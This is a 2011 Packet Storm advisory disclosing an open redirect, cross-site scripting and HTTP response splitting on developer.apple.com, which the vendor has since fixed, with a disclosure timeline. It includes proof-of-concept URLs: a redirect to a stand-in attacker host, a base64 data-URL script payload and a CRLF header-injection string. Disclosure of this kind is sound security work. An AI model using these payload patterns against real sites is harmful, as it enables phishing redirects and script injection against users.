Apple Developer Cross Site Scripting / Redirect

2011-07-01T00:00:00
ID PACKETSTORM:102699
Type packetstorm
Reporter Aung Khant
Modified 2011-07-01T00:00:00

Description

                                        
                                            `Vulnerabilities via URL Redirector in developer.apple.com  
  
  
  
1. VULNERABILITY DESCRIPTION  
  
Arbitrary URL Redirect  
======================  
  
POC (Browsers: All)  
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in/malware_exists_in_this_page  
  
Issue References:  
OWASP Top 10 A10 -  
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project  
CWE 601 - http://cwe.mitre.org/data/definitions/601.html  
  
  
Cross Site Scripting(XSS) Via Arbitrary URL Redirect  
====================================================  
  
POC (Browsers: Safari, Opera):  
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQ3Jvc3MgU2l0ZSBTY3JpcHRpbmcgRGVtbyBieVxuXG55ZWhnLm5ldFxuIik8L3NjcmlwdD4%3D  
  
Issue References:  
OWASP Top 10 A2 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project  
CWE 79 - http://cwe.mitre.org/data/definitions/79.html  
  
  
HTTP Response Splitting(HRS) Via Arbitrary URL Redirect  
========================================================  
  
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in%0D%0ALocation%3A%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2089%0D%0A%0D%0A%3Chtml%3E%3Ctitle%3EThis%20page%20was%20hacked%3F%3C%2Ftitle%3E%3Ch1%3EThis%20page%20was%20hacked%3F%20-%20Not%20Really%3C%2Fh1%3E%3C!--  
  
Issue References:  
CWE 113 - http://cwe.mitre.org/data/definitions/113.html  
  
  
Demo:  
http://yehg.net/lab/pr0js/training/view/misc/Vulnerabilities%20Via%20Redirectors%20-%20developer.apple.com/  
  
  
2. VENDOR  
  
Apple Inc  
http://www.apple.com  
  
  
3. VULNERABILITY STATUS  
  
FIXED  
  
  
4. DISCLOSURE TIME-LINE  
  
2011-04-25: reported vendor  
2011-04-27: vendor replied "Thank you for forwarding this issue to us.  
We take any report of a potential security issue  
very seriously."  
2011-06-29: vendor replied vulnerability was fixed  
2011-07-01: vulnerability was disclosed  
  
  
5. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/sites/developer.apple.com/[apple-developer]_ur_xss_hrs  
  
  
#yehg [2011-07-01]  
  
`